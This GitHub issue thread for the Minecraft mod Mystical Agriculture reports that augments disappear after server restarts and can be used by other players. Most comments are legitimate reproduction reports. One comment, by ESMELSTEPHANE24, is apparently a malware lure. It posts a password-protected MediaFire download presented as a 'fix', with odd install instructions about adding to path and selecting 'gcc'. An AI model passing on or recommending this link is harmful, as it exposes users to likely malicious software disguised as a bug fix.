### ISSUE TITLE
Augments get lost on Log Out / Server Restart | Visible to everyone

### ISSUE THREAD

**Issue by BerlinAlexK93** [BlakeBr0/MysticalAgriculture#711]
Augments get Lost after restart / logout from the Server.
The Augments are for every Player. I put a Flight Augment in my Chestplate and a friend can fly also. 
He can get the Augment out of the Chestplate and we can't fly anymore. So it's visible to everyone.

To Reproduce
Get an Augment put in Sword oder Chestplate or in another and log out and restart, after a few hours the Augment isn't in it anymore

**Expected behavior**
The Augment should be in the Slot after Relog, Restart, Logout and Login after Days.
It should not be visible to everyone.

Versions (please complete the following information):
 - Minecraft: 1.21
 - NeoForge: 1.21.0167
 - Cucumber: 8.0.3
 - Mystical Agriculture:  8.0.4
 - Singleplayer or Multiplayer: Multiplayer

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HNGamingUK** [comment]
I am noticing similar in version 0.40 of All The Mods 10. I had "No Fall Damage" on my boots and "Strength III" on my sword. After a relog/restart of the server the augment still shows on the item but doesn't work and when you put the tool/armor in the tinker table the augment disappears. 

I have done some further testing and it also happens with creatively spawned in augments.

**Comment by GartmannPit** [comment]
Same here, in version 0.45 of ATM 10, you could still temporarily fix this by simply putting the armor in the tinkering table and then reapplying the augment. As of version 0.47, this doesnt work and augments get lost, whenever the server is restarted.
